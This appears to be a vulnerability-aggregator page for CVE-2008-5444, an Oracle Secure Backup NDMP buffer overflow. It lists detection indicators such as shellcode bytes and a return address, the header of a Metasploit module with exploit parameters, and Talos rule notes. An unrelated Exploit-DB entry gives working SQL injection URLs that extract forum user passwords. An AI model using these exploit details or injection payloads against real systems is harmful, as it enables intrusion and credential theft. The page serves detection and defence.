CVE-2008-5444
published 2009-01-14CVE-2008-5444: Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity…
PriorityP269critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
60.62%
99.0th percentile
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5448 and CVE-2008-5449.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | secure_backup | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x81\xc4\x54\xf2\xff\xff
- →Detect exploitation attempts by monitoring for oversized NDMP_CONNECT_CLIENT_AUTH packets (username field ~3789+ bytes) sent to TCP port 10000 targeting Oracle Secure Backup. ↗
- →Alert on NDMP message type 0x901 (NDMP_CONNECT_CLIENT_AUTH) on TCP/10000 with abnormally large username length fields (N-packed value exceeding normal bounds). ↗
- →Look for the stack-adjustment prepend encoder byte sequence \x81\xc4\x54\xf2\xff\xff in the payload body of NDMP traffic on port 10000 as a shellcode indicator. ↗
- →Monitor for return-address value 0x608f5a28 (oracore10.dll) appearing in network traffic to TCP/10000, indicating exploitation targeting Windows 2003 SP0 / XP SP3. ↗
- ·The Metasploit module only targets Oracle Secure Backup 10.1.0.3 on Windows 2003 SP0 and Windows XP SP3; the ROP/return address (0x608f5a28 in oracore10.dll) is version-specific and will not work against other builds. ↗
- ·The payload space is limited to 1024 bytes and null bytes (\x00) are bad characters; detections relying on raw shellcode patterns must account for encoding. ↗
- ·The exploit uses a StackAdjustment of -3500 bytes via the prepend encoder, meaning the actual shellcode execution context is significantly offset from the overflow point. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f7pp-x8v9-66hm: Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10
ghsa_unreviewed·2022-05-17·CVSS 10.0
CVE-2008-5444 [CRITICAL] GHSA-f7pp-x8v9-66hm: Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5448 and CVE-2008-5449.
GHSA
GHSA-x6hv-vghf-34rm: Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10
ghsa_unreviewed·2022-05-17·CVSS 10.0
CVE-2008-5449 [CRITICAL] GHSA-x6hv-vghf-34rm: Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5444 and CVE-2008-5448.
GHSA
GHSA-qpj8-xcmr-qg4j: Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10
ghsa_unreviewed·2022-05-17·CVSS 10.0
CVE-2008-5448 [CRITICAL] GHSA-qpj8-xcmr-qg4j: Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10
Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2008-5444 and CVE-2008-5449.
No detection rules found.
Exploit-DB
Oracle Secure Backup - NDMP_CONNECT_CLIENT_AUTH Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-5444 Oracle Secure Backup - NDMP_CONNECT_CLIENT_AUTH Buffer Overflow (Metasploit)
Oracle Secure Backup - NDMP_CONNECT_CLIENT_AUTH Buffer Overflow (Metasploit)
---
##
# $Id: osb_ndmp_auth.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow',
'Description' => %q{
The module exploits a stack buffer overflow in Oracle Secure Backup.
When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,
an attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
Exploit-DB
Meto Forum 1.1 - Multiple SQL Injections
exploitdb·2008-05-13
CVE-2008-2448 Meto Forum 1.1 - Multiple SQL Injections
Meto Forum 1.1 - Multiple SQL Injections
---
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\
Meto Forum v1.1 Multiple Remote SQL İinjectin Vulnerable
Script : http://www.aspindir.com/goster/5444
Risk : Forum in All users saved password is to take.
Coded : Asp , SQL Language = 'Acces'
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-/
EİP [1] Exploit:
http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test
Log in Admin Panel > cookie Saved ,
This Script file have SQL İnjectin atack.
http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1 2,3,4,5,6
http://localhost:2222/lab/M
Metasploit
Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
metasploit
Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
The module exploits a stack buffer overflow in Oracle Secure Backup. When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, an attacker may be able to execute arbitrary code.
Talos
Rule release for today - January 27th 2009
blogs_talos·2009-01-27·CVSS 10.0
CVE-2008-4006 [CRITICAL] Rule release for today - January 27th 2009
## Rule release for today - January 27th 2009
Large batch of Oracle vulnerabilities today. We've had to work through these carefully as details were pretty scant. Here's what we released:
Oracle Secure Backup Command Injection (CVE-2008-4006) Oracle BPEL Injection (CVE-2008-4014) Oracle Secure Backup Command Injection (CVE-2008-5440) Oracle Secure Backup Buffer Overflow (CVE-2008-5444) Oracle Secure Backup Command Injection (CVE-2008-5448) Oracle Secure Backup Command Injection (CVE-2008-5449) Oracle BEA WebLogic Denial of Service (CVE-2008-5457)
More details can be found here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-27.html
Talos
Rule release for today - January 27th 2009
blogs_talos·2009-01-27·CVSS 10.0
CVE-2008-4006 [CRITICAL] Rule release for today - January 27th 2009
Large batch of Oracle vulnerabilities today. We've had to work through these carefully as details were pretty scant. Here's what we released:
Oracle Secure Backup Command Injection (CVE-2008-4006)
Oracle BPEL Injection (CVE-2008-4014)
Oracle Secure Backup Command Injection (CVE-2008-5440)
Oracle Secure Backup Buffer Overflow (CVE-2008-5444)
Oracle Secure Backup Command Injection (CVE-2008-5448)
Oracle Secure Backup Command Injection (CVE-2008-5449)
Oracle BEA WebLogic Denial of Service (CVE-2008-5457)
More details can be found here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-27.html
http://secunia.com/advisories/33525http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.htmlhttp://www.securityfocus.com/bid/33177http://www.vupen.com/english/advisories/2009/0115http://secunia.com/advisories/33525http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.htmlhttp://www.securityfocus.com/bid/33177http://www.vupen.com/english/advisories/2009/0115
2009-01-14
Published